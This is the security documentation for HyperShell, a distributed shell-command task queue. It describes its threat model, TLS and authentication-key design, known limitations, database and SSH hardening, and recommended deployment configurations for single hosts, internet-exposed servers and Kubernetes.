Security¶
Overview¶
HyperShell runs arbitrary shell commands on every machine that connects to its task queue. A HyperShell deployment is therefore only ever as secure as the network it operates on and the authentication material that gates it. This document describes the security architecture, the cryptographic protections built into the queue transport, and the recommended deployment patterns for trusted networks, public-internet exposure, and Kubernetes.
The two security primitives users need to understand are:
a shared authentication key that both server and clients must hold to participate in the queue, and
an end-to-end TLS layer that protects every byte of queue traffic on the wire.
Both are enabled by default and configured so that the most common deployment scenario — a
single-host LocalCluster — works out of the box with no operator action required.
Architecture¶
Components¶
HyperShell is built on Python’s multiprocessing.managers.BaseManager and
multiprocessing.JoinableQueue infrastructure. The runtime decomposes into three
roles:
Submit ingests shell commands from
stdinor files and writes them to the database (SQLite or PostgreSQL) with stable UUIDs.Server pulls pending tasks from the database, bundles them, and exposes four
JoinableQueueinstances to clients via RPC over TCP:scheduled— task bundles awaiting executioncompleted— results returned from clientsheartbeat— periodic liveness reports from clientsconfirmed— explicit acknowledgement of received bundles
Client connects to the server, pulls bundles from the
scheduledqueue, spawns shell subprocesses, and returns results on thecompletedqueue.
The cluster command (hsx) composes the three roles in a single process group for
local-only or SSH-distributed workflows.
Threat Model¶
Because tasks are arbitrary shell commands, the queue must be treated as a privileged channel:
Arbitrary code execution. Any party able to enqueue a task can run it on every connected client. Connection authentication is therefore the primary security control, not an optional convenience.
Data exposure. Task definitions, exit status, timing, and heartbeat data travel through the queue. Task
stdoutandstderrdo not — they are written to disk on the client (locally, or on a shared filesystem if one is configured) and retrieved on demand over SFTP viaSSHConnectionwhen the operator runshs task info --stdoutor similar. Without transport encryption, the metadata that does flow over the queue (including the authentication handshake) is readable on the wire.Active network attacks. Unencrypted traffic is vulnerable to man-in-the-middle modification, command injection, and replay. With encryption but no peer authentication, it is vulnerable to active impersonation.
Rogue clients. A client that holds the auth key can join the queue and pull tasks; a stolen key effectively grants full task-execution privileges on every node the client can reach.
Denial of service. Neither connection flooding nor application-level resource exhaustion is mitigated by cryptography. The queue transport imposes no handshake timeout, frame-size cap, or connection limit of its own (see the Built-in TLS Limitations below), so DoS resistance must come from firewall and rate-limit controls at the network layer.
The defenses below address (1)–(3) directly and partially address (4). DoS mitigation is provided at the network perimeter, not by the queue transport.
Built-in TLS¶
Overview¶
HyperShell speaks TLS natively for its queue transport. There is no external middleware
(stunnel, nginx, sidecar) required — the listener, the connect path, and every
per-proxy RPC opened by multiprocessing.managers.BaseProxy are wrapped with TLS
automatically when enabled. The implementation lives in hypershell.core.tls and
hypershell.core.queue.
TLS is enabled by default. The default configuration is designed so that a fresh install
on a single host can run hsx without any operator intervention: certificates are
generated on first start, the client trusts the same certificate file via a shared
filesystem path, and the queue proceeds over an encrypted, authenticated channel.
How It Works¶
A dedicated serializer key, 'hypershell-tls', is registered in
multiprocessing.managers.listener_client and points to a TLS-aware listener/client
pair (hypershell.core.queue.SecureListener and
hypershell.core.queue.secure_client()). Whenever a manager is constructed with this
serializer, every byte on the wire — the initial handshake, the BaseManager challenge/
response, every per-proxy RPC, and every server-side accept — transparently routes through
TLS.
The hypershell.core.queue.SecureManager class selects this serializer when an active
hypershell.core.tls.TLSConfig is supplied. If TLS is disabled (or no configuration
is found), SecureManager is byte-for-byte equivalent to a stock BaseManager with
the default pickle serializer, so cleartext deployments remain supported for
constrained environments.
Authentication Key¶
Independent of TLS, the queue gates connections with a shared authentication key. The key is never sent over the queue socket. It is used directly (ASCII-encoded) as the key for the standard multiprocessing handshake — an HMAC challenge/response with a fresh per-connection nonce — so the secret itself never crosses the queue transport:
authkey = config.server.auth.encode('ascii')
An eavesdropper on the queue transport cannot recover the auth string from the handshake and
cannot forge a valid response without it, and the per-connection nonce precludes replay of a
captured exchange. This holds against a passive observer, and against an active attacker only
once the TLS peer has been verified (via cafile + servername or a pinned
fingerprint). The handshake is not cryptographically bound to the TLS channel, so in
insecure mode — where the peer is not authenticated — an active man-in-the-middle can
relay the challenge/response. Verify the peer, and do not use insecure mode on untrusted
networks, so the key is exchanged only with the intended server.
For LocalCluster, RemoteCluster, SSHCluster, and autoscaling invocations,
HyperShell generates a fresh random key for every invocation via secrets.token_hex(64),
scoped to that single cluster lifetime; the operator never sees or configures it. For
standalone hs server / hs client deployments, the operator supplies the key via
configuration, environment, or the --auth CLI option.
To keep the shared secret meaningful, hs server refuses to start with the built-in
placeholder key and enforces a minimum key policy: the key must be at least 16 characters and
drawn from [A-Za-z0-9._+/=-] (which admits hex, URL-safe tokens, and standard Base64). The
key generators used in the deployment guides below satisfy this policy.
The key is visible on the client command line in cluster launches
For SSHCluster and the MPI/SLURM launchers, the per-invocation key is passed to each
client process as a -k command-line argument. On multi-user client hosts it is
therefore visible in the process table (ps / /proc) and scheduler accounting for
the lifetime of the client, even though it is redacted from HyperShell’s own launch
logs. Treat every host that holds the key as inside the trust boundary. A directly
configured server.auth is likewise stored in plaintext in the config file and printed
verbatim by hs config get; prefer the _eval / _env suffixes (see below) to
keep the secret out of the file.
Auto-generated Certificates¶
The first time a server starts with TLS enabled and cert/key set to '<auto>',
HyperShell generates a self-signed RSA-3072 certificate covering the local FQDN, the short
hostname, localhost, 127.0.0.1, and ::1 and writes the materials under the
site library directory:
Linux / POSIX:
$HOME/.hypershell/lib/tls/server.crtandserver.keymacOS:
$HOME/Library/HyperShell/tls/server.crtandserver.keyWindows:
%APPDATA%\HyperShell\Library\tls\server.crtandserver.key
The private key is written with mode 0600 (owner-only) and the certificate with mode
0644. The SHA-256 fingerprint is logged at INFO level when the certificate is
generated so the operator can paste it into the client configuration of a remote node or
pin it via server.tls.fingerprint.
Subsequent server starts find the existing materials and reuse them — the operation is idempotent. Delete the two files to force regeneration (for example, after the hostname changes).
Configuration¶
TLS is configured under the [server.tls] namespace in the HyperShell TOML config:
[server.tls]
enabled = true # default
cert = "<auto>" # path to server cert, or '<auto>'
key = "<auto>" # path to server key, or '<auto>'
cafile = "<auto>" # trust anchor; '<auto>' = server's own cert (single-host / shared-FS)
fingerprint = "<none>" # 'SHA256:AB:CD:...' pin (overrides cafile verification)
insecure = false # disable peer verification entirely (logs a warning)
min_version = "TLSv1.2" # or 'TLSv1.3'
ciphers = "<none>" # OpenSSL cipher string
servername = "<none>" # SNI / hostname check override
Every key is also exposed via environment variables with the standard HYPERSHELL_ prefix
and the same precedence as other settings (CLI > environment > local config > user config >
system config > defaults):
HYPERSHELL_SERVER_TLS_ENABLED=true
HYPERSHELL_SERVER_TLS_CERT=/etc/hypershell/tls/server.crt
HYPERSHELL_SERVER_TLS_KEY=/etc/hypershell/tls/server.key
HYPERSHELL_SERVER_TLS_CAFILE=/etc/hypershell/tls/ca.crt
HYPERSHELL_SERVER_TLS_FINGERPRINT=SHA256:AB:CD:EF:...
Peer Verification Modes¶
The client side of every connection decides how to validate the server certificate. Four modes are supported, in decreasing strength:
CA verification — set
cafileto a trust anchor file (PEM bundle) andservernameto the expected hostname. The client validates the chain against that anchor (ssl.CERT_REQUIRED) and checks that the certificate matches the expected name (SNI / SAN check). This is the recommended mode for multi-host deployments with operator-managed PKI.servernameis required for server-identity verification, not an optional extra: withcafileset butservernameunset, the client verifies only that the certificate chains to the anchor and does not check which host presented it, so any certificate issued by that anchor — from any host — is accepted. Always setservernameon untrusted networks.Fingerprint pinning — set
fingerprintto the server’sSHA256:AB:CD:...digest. The client completes the TLS handshake without CA validation and rejects the connection if the post-handshake fingerprint does not match. Use this when the operator already trusts the server out-of-band and wants minimal configuration — typical for self-signed certificates and small clusters.System CA bundle — leave
cafile,fingerprint, andinsecureall unset. The client loads the platform’s default CA store and requires hostname verification. Use this with a real public-CA-issued certificate (e.g., Let’s Encrypt).Insecure mode — set
insecure = true. The handshake completes but the peer identity is not authenticated. The transport is still encrypted, but with no peer verification an active man-in-the-middle can impersonate the server and relay the auth-key handshake (which is not bound to the TLS channel). Suitable only for transient local debugging on a trusted host; logs a warning on every connection. Do not use it on untrusted networks.
When both cafile and fingerprint are set, fingerprint takes precedence and
cafile is ignored.
Limitations¶
Understanding these properties matters most for deployments on untrusted networks.
No mutual TLS. Clients are not required to present certificates. The shared authentication key authenticates the client to the server; TLS authenticates the server to the client. There is no certificate-based client identity.
Pickle-serialized RPC. The queue is built on Python’s multiprocessing managers, whose RPC serializes objects with
picklein both directions. The authentication key and (non-insecure) TLS peer verification are the controls that gate this channel: a party that holds the key and reaches the server — or, ininsecuremode, an active man-in-the-middle — can do more than enqueue tasks. Keep the key secret, keep peer verification enabled, and treat every host that holds the key as inside the trust boundary.Self-signed by default; single-leaf trust. The auto-generated certificate is self-signed (not chained to a public CA), valid for ten years, and has no revocation path; the private key is written to the site directory unencrypted and owner-only (
0600), as is normal for an unattended service. Withcafile = '<auto>'the client trusts that exact certificate as its own anchor, resolved per host — so this works out of the box only on a single host or a shared filesystem. A standalone remote client must be given the server’s certificate or its pinnedfingerprintout of band; otherwise it trusts its own auto-generated certificate and the handshake to the real server fails (do not work around this withinsecuremode). Rotating the auto-generated certificate requires redistributing the new certificate or fingerprint to clients.No transport-level DoS controls. The queue sets no per-connection handshake timeout, no inbound frame-size cap, and no limit on concurrent connections or worker threads. A peer that reaches the listener — including a slow peer that stalls before authenticating — can consume server resources, and failed authentication/handshake attempts are handled by the underlying multiprocessing layer without surfacing in HyperShell’s logs. Denial-of-service protection must come from the network layer (see the deployment guides).
IPv4 only. The built-in TLS queue listener binds
AF_INET(IPv4). On IPv6-only or IPv6-preferred networks, clients must reach the server over an IPv4 address.No pre-shared-key TLS. PSK would be a natural fit for the shared-secret model but is only available in Python 3.13+; HyperShell supports 3.9+.
Adjacent Trust Surfaces¶
HyperShell’s built-in TLS protects the queue transport and nothing else. A production deployment touches at least two additional security boundaries that the HyperShell process is not in a position to enforce: the task database and (when used) the SSH transport for distributing clients or fetching task output. Both must be hardened independently of the queue.
The Task Database¶
The database (SQLite or PostgreSQL) is the canonical source of truth for what tasks exist and what their command strings are. The server reads pending tasks from the database and hands them to clients for execution. Anyone who can write rows into the ``task`` table can execute arbitrary shell commands on every connected client — equivalent to root access on the entire compute fleet if clients run as root, or to user-level access to every client host otherwise.
Securing the database is the operator’s responsibility
HyperShell does not authenticate or authorize callers at the database layer. It trusts the database connection. If you use PostgreSQL, the security of that PostgreSQL instance — network exposure, role/permission model, TLS configuration, backup access — is part of your HyperShell threat surface and must be treated with the same care as the queue itself. A SQL-injection bug in any unrelated application that shares the same database, or a leaked PostgreSQL password, is functionally equivalent to a stolen HyperShell authentication key.
SQLite. When database.provider = 'sqlite' (the default), the database is a local
file under the site library directory. Security reduces to filesystem permissions: the
file should be readable and writable only by the user that runs the HyperShell server.
Avoid placing the SQLite file on a network filesystem unless every host that mounts it is
inside the same trust boundary as the server itself.
PostgreSQL. When database.provider = 'postgres', the HyperShell server connects
via psycopg (v3) (the postgresql+psycopg dialect).
HyperShell constructs a standard SQLAlchemy URL and passes it to
sqlalchemy.create_engine(); everything related to transport security is configured
in that URL (or in connect_args) and is delegated to psycopg and the underlying
libpq. HyperShell itself adds nothing.
For production deployments, prefer the postgres-system or postgres-c install extra
over postgres (see Installation): both link the operating-system libpq/OpenSSL, so
the TLS stack receives OS security updates, whereas the default postgres extra bundles a
frozen copy inside the wheel.
Concretely, the database does not speak TLS unless your URL says so. A bare
postgresql://user:pass@host/db connects in cleartext and accepts the server’s
certificate (or lack thereof) without verification. To require TLS and verify the server,
append the standard libpq query parameters:
[database]
provider = "postgres"
database = "hypershell"
host = "db.example.com"
user = "hypershell"
password_eval = "cat /etc/hypershell/pg-pass.key"
sslmode = "verify-full"
sslrootcert = "/etc/hypershell/pg-ca.crt"
sslmode accepts (in order of strength) disable, allow, prefer, require,
verify-ca, and verify-full. Anything below verify-full is vulnerable to
man-in-the-middle attack against the database connection. The standard libpq
documentation covers the full parameter set:
https://www.postgresql.org/docs/current/libpq-ssl.html.
In addition to transport security, harden the PostgreSQL instance itself:
Bind PostgreSQL to a non-public interface and restrict access in
pg_hba.confto the hosts that actually run the HyperShell server.Create a dedicated PostgreSQL role for HyperShell with the minimum privileges needed to operate on the HyperShell schema. Do not reuse the
postgressuperuser.Rotate the database password on the same cadence as the HyperShell authentication key.
Treat database backups with the same sensitivity as the live database — they contain the same command strings.
SSH for Cluster Distribution and Output Retrieval¶
Two HyperShell features rely on SSH:
SSHClusterdistributes client processes to remote hosts viaparamiko. The host list, key material, and remote shell are all configured through the user’s standard~/.ssh/config.hs info <task> --stdout/--stderrfetches the captured task output from the client host via SFTP (alsoparamiko), since output is not sent through the queue.
Security for these paths is provided entirely by SSH itself — host key verification, key
rotation, authorized_keys policy, StrictHostKeyChecking, and so on. HyperShell
does not bypass or weaken any of these controls. Treat the SSH configuration that
HyperShell uses with the same care you would treat any other SSH-based automation:
prefer key-based authentication, disable password auth, keep known_hosts populated,
and audit authorized_keys for unexpected entries.
Deployment Guides¶
Local Single-Host (Default)¶
For LocalCluster and SSH-distributed workflows on a shared filesystem (the typical
HPC scenario), no operator action is required. The default configuration:
Generates a self-signed certificate on first server start
Writes it to the site library directory readable by every process on the host
Configures the client to trust the same file (
cafile = '<auto>'mirrorscert)Generates a fresh random authentication key per cluster invocation
The most common command therefore needs no security flags:
seq 1000 | hsx -t 'echo {}' -N16
Cross-host workflows over SSH (hsx --ssh 'a[00-32].cluster') inherit the same setup
provided that every host shares the site library directory via NFS, Lustre, GPFS, or
similar. The server writes the certificate once; every SSH-launched client reads it from
the same path.
When the shared filesystem assumption breaks
Each client resolves its TLS trust from its own configuration and environment — the
launchers do not ship certificate material to clients. On a shared filesystem this
resolves to the same server-generated certificate automatically; without one, give each
client the server’s trust anchor out of band. The simplest option is to pin the server
fingerprint (HYPERSHELL_SERVER_TLS_FINGERPRINT=SHA256:..., logged by the server at
INFO on first start); alternatively distribute the certificate to each node and set
HYPERSHELL_SERVER_TLS_CAFILE (with HYPERSHELL_SERVER_TLS_SERVERNAME). Never
distribute the private key.
Linux Cluster Exposed to the Internet¶
For deployments that accept client connections from outside a trusted network — for example, a head-node HyperShell server reachable over the public internet by remote workers — the recommended configuration uses operator-managed certificates and a strong, operator-managed authentication key.
Step 1 — Generate a strong authentication key.
openssl rand -base64 48 > /etc/hypershell/auth.key
chmod 600 /etc/hypershell/auth.key
chown hypershell:hypershell /etc/hypershell/auth.key
Distribute this file securely to every client (e.g., via configuration management, a secrets store, or out-of-band channel). Never check it into source control.
Step 2 — Provision a real TLS certificate.
The cleanest path for a server with a stable hostname is Let’s Encrypt via certbot:
certbot certonly --standalone -d hypershell.example.com
This produces /etc/letsencrypt/live/hypershell.example.com/fullchain.pem (cert) and
privkey.pem (key). Configure HyperShell to use them:
# /etc/hypershell.toml
[server]
bind = "0.0.0.0"
auth_eval = "cat /etc/hypershell/auth.key"
[server.tls]
enabled = true
cert = "/etc/letsencrypt/live/hypershell.example.com/fullchain.pem"
key = "/etc/letsencrypt/live/hypershell.example.com/privkey.pem"
min_version = "TLSv1.3"
_eval and _env suffixes
Any setting with an _eval suffix is resolved by shelling out to the named command
and capturing stdout; _env reads the named environment variable. These are
cmdkit features available on every configuration key. They let secrets stay outside
the TOML file. For example, auth_eval = "vault read -field=value secret/hypershell"
or auth_env = "HYPERSHELL_AUTH_VALUE".
For environments without internet-reachable HTTP for ACME validation, use an internal CA
(e.g., HashiCorp Vault PKI, smallstep, FreeIPA). Configure the same cert/key paths
to point at the issued material.
Step 3 — Configure the client to verify the server.
If clients can resolve and connect to a public hostname covered by the server’s cert, leave
cafile unset and let the platform’s default CA store handle verification:
# client-side config
[server]
host = "hypershell.example.com"
auth_eval = "cat /etc/hypershell/auth.key"
If you used an internal CA, distribute the CA’s root certificate to each client and pin it explicitly:
[server.tls]
enabled = true
cafile = "/etc/hypershell/internal-ca.crt"
servername = "hypershell.example.com" # require SAN match
min_version = "TLSv1.3"
If you accept a self-signed certificate (acceptable for small operator-managed deployments),
pin the fingerprint instead — the server logs it at INFO on first start:
[server.tls]
enabled = true
fingerprint = "SHA256:AB:CD:EF:01:23:..."
Step 4 — Restrict network exposure.
Cryptography is not a substitute for network controls. Combine TLS with:
A host firewall (
ufw,firewalld,iptables) restricting the server port to known client IP rangesA perimeter firewall or VPN tunnel for cross-site connectivity
fail2ban or equivalent to throttle abusive connection attempts
OS-level rate limits (
iptables -m connlimit) to bound the connection rate
Step 5 — Run with least privilege.
useradd --system --shell /usr/sbin/nologin hypershell
chown -R hypershell:hypershell /var/lib/hypershell /etc/hypershell
# systemd unit running as User=hypershell, Group=hypershell
Never run the HyperShell server as root. Tasks executed by clients run as whichever
user the client process runs as; constrain that user to the minimum privileges required
for the workload.
Kubernetes Deployment¶
Kubernetes is a natural fit for HyperShell: the server runs as a long-lived workload
(StatefulSet if backed by SQLite on a PersistentVolume, Deployment if backed
by PostgreSQL), and clients run as elastically-scaled Deployment or Job workloads.
Certificate management with cert-manager.
Use cert-manager to provision and rotate the server
certificate. A Certificate resource against an internal Issuer (or ACME-backed
ClusterIssuer) produces a Secret containing tls.crt, tls.key, and
ca.crt:
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: hypershell-server
namespace: hypershell
spec:
secretName: hypershell-server-tls
issuerRef:
name: internal-ca
kind: ClusterIssuer
commonName: hypershell-server.hypershell.svc.cluster.local
dnsNames:
- hypershell-server
- hypershell-server.hypershell
- hypershell-server.hypershell.svc.cluster.local
duration: 2160h # 90 days
renewBefore: 360h # 15 days
Secret for the authentication key.
Store the shared auth key as a Secret rather than embedding it in a manifest:
kubectl create secret generic hypershell-auth \
--namespace hypershell \
--from-literal=auth="$(openssl rand -base64 48)"
Server StatefulSet.
Mount both Secrets into the server pod and expose the TLS configuration via environment variables:
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: hypershell-server
namespace: hypershell
spec:
serviceName: hypershell-server
replicas: 1
selector:
matchLabels: { app: hypershell-server }
template:
metadata:
labels: { app: hypershell-server }
spec:
containers:
- name: server
image: hypershell/hypershell:latest
args: ["hs", "server", "--bind", "0.0.0.0"]
env:
- name: HYPERSHELL_SERVER_TLS_ENABLED
value: "true"
- name: HYPERSHELL_SERVER_TLS_CERT
value: /tls/tls.crt
- name: HYPERSHELL_SERVER_TLS_KEY
value: /tls/tls.key
- name: HYPERSHELL_SERVER_TLS_MIN_VERSION
value: TLSv1.3
- name: HYPERSHELL_SERVER_AUTH
valueFrom:
secretKeyRef: { name: hypershell-auth, key: auth }
ports:
- containerPort: 50001
name: queue
volumeMounts:
- { name: tls, mountPath: /tls, readOnly: true }
- { name: data, mountPath: /var/lib/hypershell }
volumes:
- name: tls
secret: { secretName: hypershell-server-tls }
volumeClaimTemplates:
- metadata: { name: data }
spec:
accessModes: [ReadWriteOnce]
resources: { requests: { storage: 10Gi } }
Service and NetworkPolicy.
Expose the server as a ClusterIP Service and lock down access with a
NetworkPolicy:
apiVersion: v1
kind: Service
metadata:
name: hypershell-server
namespace: hypershell
spec:
selector: { app: hypershell-server }
ports:
- port: 50001
targetPort: 50001
name: queue
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: hypershell-server-allow-clients
namespace: hypershell
spec:
podSelector:
matchLabels: { app: hypershell-server }
policyTypes: [Ingress]
ingress:
- from:
- podSelector:
matchLabels: { app: hypershell-client }
ports:
- { protocol: TCP, port: 50001 }
Client Deployment.
Mount the same auth Secret and the CA from the cert-manager-issued Secret:
apiVersion: apps/v1
kind: Deployment
metadata:
name: hypershell-client
namespace: hypershell
spec:
replicas: 8
selector:
matchLabels: { app: hypershell-client }
template:
metadata:
labels: { app: hypershell-client }
spec:
containers:
- name: client
image: hypershell/hypershell:latest
args:
- "hs"
- "client"
- "--host"
- "hypershell-server.hypershell.svc.cluster.local"
env:
- name: HYPERSHELL_SERVER_TLS_ENABLED
value: "true"
- name: HYPERSHELL_SERVER_TLS_CAFILE
value: /tls/ca.crt
- name: HYPERSHELL_SERVER_TLS_SERVERNAME
value: hypershell-server.hypershell.svc.cluster.local
- name: HYPERSHELL_SERVER_AUTH
valueFrom:
secretKeyRef: { name: hypershell-auth, key: auth }
volumeMounts:
- { name: tls, mountPath: /tls, readOnly: true }
volumes:
- name: tls
secret: { secretName: hypershell-server-tls }
The client’s HYPERSHELL_SERVER_TLS_SERVERNAME matches the cert’s SAN, which makes the
TLS layer reject any pod that happens to attach to the same Service but presents a
different certificate.
Service mesh as an alternative
If your cluster already runs a service mesh (Istio, Linkerd) with mTLS for all
in-cluster traffic, you can rely on the mesh for transport security and disable
HyperShell’s own TLS layer (set HYPERSHELL_SERVER_TLS_ENABLED=false). The shared
authentication key still gates queue access. This is appropriate when the mesh-provided
identity model is authoritative and you want to avoid double encryption.
External Tunneling (Legacy)¶
For sites that pre-date built-in TLS or that already operate a sidecar tunneling layer for other reasons, HyperShell can run over an external tunnel with its own TLS disabled. This is documented for completeness; new deployments should prefer the built-in transport.
VPN. WireGuard, Tailscale, or OpenVPN provide a transparent encrypted tunnel between client and server hosts. HyperShell runs as if on a private network; no TLS configuration is required on the HyperShell side, though enabling it adds defense-in-depth at negligible cost.
stunnel. A stunnel sidecar can wrap a cleartext HyperShell connection in TLS:
# server-side stunnel.conf
[hypershell]
accept = 0.0.0.0:50001
connect = 127.0.0.1:50000
cert = /path/to/server-cert.pem
key = /path/to/server-key.pem
# client-side stunnel.conf
[hypershell]
client = yes
accept = 127.0.0.1:50000
connect = server.example.com:50001
CAfile = /path/to/ca-cert.pem
verify = 2
With this layout the HyperShell server binds localhost:50000 and stunnel handles
TLS on port 50001. Disable HyperShell’s built-in TLS
(HYPERSHELL_SERVER_TLS_ENABLED=false) to avoid double-wrapping.
Operational Recommendations¶
Independent of the deployment style above:
Rotate keys and certificates regularly. A 90-day rotation cadence is a sensible default for both the auth key and the TLS certificate. cert-manager and Let’s Encrypt handle the certificate side automatically; the auth key requires an operator-driven rolling restart of server and clients.
Run as an unprivileged user. The HyperShell server itself does not require elevated privileges. Tasks run as the user that owns the client process; constrain that user accordingly.
Enable audit logging. Set
logging.style = "detailed"(or"system") and ship logs to a central collector. The server logs every client connection, every task dispatched, and every completion. See logging for details. The per-invocation auth key is redacted from launch logs, but avoid shipping full configuration dumps (which contain a directly-setserver.auth) to shared log infrastructure.Sanitize task input. When generating tasks programmatically, treat the command string as a shell-injection vector — escape or template carefully, and never interpolate untrusted input into the command.
hsxaccepts arbitrary input fromstdinby design; the trust boundary is whoever can write to that pipe.Monitor connection patterns. HyperShell does not itself log failed authentication or failed TLS handshakes — they are handled by the underlying multiprocessing / TLS layer and not surfaced in the application log — so watch for probes and connection surges at the network layer (firewall counters,
fail2ban, flow logs) rather than expecting them in HyperShell’s output.
References¶
Summary¶
HyperShell enables powerful parallel computing but requires careful attention to security because it executes arbitrary shell commands by design. The two essential controls HyperShell itself provides are the shared authentication key that gates the queue and the TLS layer that protects queue traffic on the wire. Both are enabled by default and self-provisioning on a single host; both are configurable end-to-end for multi-host deployments through TOML, environment variables, and CLI flags. Beyond the queue, the task database (especially PostgreSQL) and any SSH transports used for client distribution or output retrieval are adjacent trust surfaces that must be hardened independently.
Recommended practice:
Local single-host workflows — accept the defaults. Auto-generated self-signed certificates and per-invocation auth keys are sufficient.
Multi-host on trusted networks — accept the defaults if the site library directory is shared; otherwise pin the server fingerprint on each client.
Multi-host across untrusted networks — provision a real certificate (Let’s Encrypt or an internal CA), distribute a strong shared auth key out of band, restrict the server port at the firewall, run as an unprivileged user, and require
sslmode=verify-fullfor any PostgreSQL connection.Kubernetes — use cert-manager for certificates,
Secretfor the auth key,NetworkPolicyfor connectivity, and consider an existing service mesh as an alternative transport-security layer.Database and SSH — treat the PostgreSQL instance and your SSH key/host-key policy as part of the HyperShell threat surface. A leaked database password or a permissive
authorized_keysdefeats every protection in the queue.
For questions or to report security vulnerabilities, please contact the maintainers via the GitHub repository or join the Discord community.